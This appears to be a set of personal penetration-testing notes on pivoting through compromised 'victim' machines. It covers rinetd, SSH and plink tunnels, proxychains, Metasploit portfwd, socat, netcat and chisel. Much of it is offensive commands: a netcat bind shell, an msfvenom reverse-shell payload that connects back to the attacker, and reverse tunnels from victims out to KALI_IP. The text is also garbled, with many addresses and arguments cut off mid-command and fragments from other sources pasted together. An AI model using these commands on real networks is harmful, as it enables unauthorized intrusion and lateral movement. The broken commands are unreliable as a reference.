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Port Redirection and Pivoting

#Using SShuttle

sudo sshuttle -r user@
 Port Forwarding: It is accepting traffic on a given ip address and redirecting
it to different ip and port

Inbound: traffic initiated from outside.

Outbound: traffic initiated from inside.
time nmap -p- | grep -i open 
   /Helps in checking outbound traffic Open POrts
a windows XP machine has only 80 and 443 ports have outbound traffic allowed,
but we need to access a server using RDP(3389) in the same network. to access that we need to use port forwarding,
that menas we need an intermediate proxy --> which can be our kali linux machine.

on Kali: 
---------- Need to have a Public Address, IDK

vi /etc/rinetd.conf  Port Forwarding Utility Config
#bindaddress bindport  connect address  connect port
KALI_Public_IP  80  RDP_Server_address 3389

/ we set it up to accept traffic from external interface on TCP port 80 and then
redirect to our remote windows server 3389

/etc/init.d/rinetd restart

Copy the KALI_IP (Proxy IP) and run it in windows RDP --> you can access it

RINETD server forwards incoming traffic to the windows 2003 remote desktop service

SSH = Tunnelling & Proxies:

SSH local Port Forwarding:  ssh -L
allows us to connects a local port to a remote port over an encrypte SSH tunnel.

SSH Remote Port Forwarding:
allows us to tunnel a remote port to a local port over an encrypte SSH tunnel.
 ON VICTIM Machine:
plink.exe is a SSH client for windows

netstat -an | find "LISTEN"  /RDP port is open
 / we would like to access RDP port on this internal non-routable machine
 /we can create a reverse ssh tunnel from the victim machine from our attacking box and tunnel out the remote desktop machine from the windows machine and make that port available on my attacking box.

Check for listening ports 
netstat -an | find "LISTEN"

From the victim Machine, do a reverse ssh tunnel

Remote Port Forwarding: 

on VICTIM Machine:

plink -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:

plink -l root -pw password KALI_IP -R 3390:  

on KAlI:  netstat -antp | grep LISTEN
/we can find 3390 Listening on Kali Machine

rdesktop  /Login through RDP using the Remote Tunnel
---------------------------SOCKS4 PROXY

ON Kali:

SSH -D 8080 root@VICTIM_IP  /Need pass --> we can login.. and port forwarding port 22 as well

netstat -atnp | grep 8080  /Check if the port is opened or not

nano /etc/proxychains.conf

socks4 8080

proxychains nmap -p 3389 -sT -Pn Victim_IP/24 --open /Nmap TCP connect Scan the Victim Ip for RDP
 /Proxychains take this traffic and redirects it to the DMZ network(in this case - example), this is slow 

proxychains netdiscover -r VICTIM_IP/24 

proxychains rdesktop IP_Found_from_Nmap
Port Forwarding using Metasploit:
get a meterpreter session first --> Note the IP address of the victim (

route add 1
portfwd add -l 445 -p 445 -r
Port Forwarding using SoCat:

Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine.

From Victim-1 machine: do a port scan as above and port forrward the required ports
/Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &  
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & 

netstart -plunt    /View the binded ports, we can see 8009 & 8080 in Victim_machine1

Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: 
socat tcp-listen:4321,fork tcp:KALI_IP:4321 & 
Port Forwarding using Netcat

nc -l -p $localport -c "nc $remotehost $remoteport"

netcat -nvlp 9001       /Listen on port 9001

netcat -l -p 9001 -e /bin/bash  /Create a bash shell on port 9001

netcat -L KALI_IP:80 -p 8902            /Forward local por 9002 to remote port 80

netcat -L kali_IP:80 -p 9002 -x        /Port Forward Hex dump

Pivoting from GITHUB
PORT FORWARDING "port to port":

Most platforms

Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r
Use -R to make it reverse

For Linux

~C "if you already have an SSH session"

-R 8081: (on my Kali machine listen on 8081, get it from
Now you can access, which you didn't have direct access to

-L 8083: (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI>:8084<------------<REMOTE>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if receives a reverse shell, you will get it

For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali

Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345: test@

Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine

On Target: plink.exe -P 22 -C -N -L -l KALIUSER -pw PASS

For linux

Forward your 8083 to
./socat TCP4-LISTEN:8083,fork TCP4:

Most platforms

Remote static tunnels "port to port":

On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse

General command:

Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client R:

Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 9001:


DYNAMIC "port to any":
setup proxychains with socks5 on
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf

Most platforms

Get meterpreter session on one of the dual homed machines
Auto route to (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)

For Linux


Just like SSH, on Windows

On Target: plink.exe -P 22 -C -N -D 1080 -l KALIUSER -pw PASS

Most platforms

On Kali:
./chisel server -p 8000 -reverse

On Target:
./chisel client R:8001:
./chisel server -p 8001 --socks5

On Kali:
./chisel client socks

Depending on your scope, some of the machines may not be directly accessible. There are systems out there that are dual homed, which allow you to connect into an internal network. You will need to know some of these techniques in order to obtain access into there non-public networks:
Tools to help you with Port Forwarding and Pivoting:
Vulnerable systems to practice pivoting:


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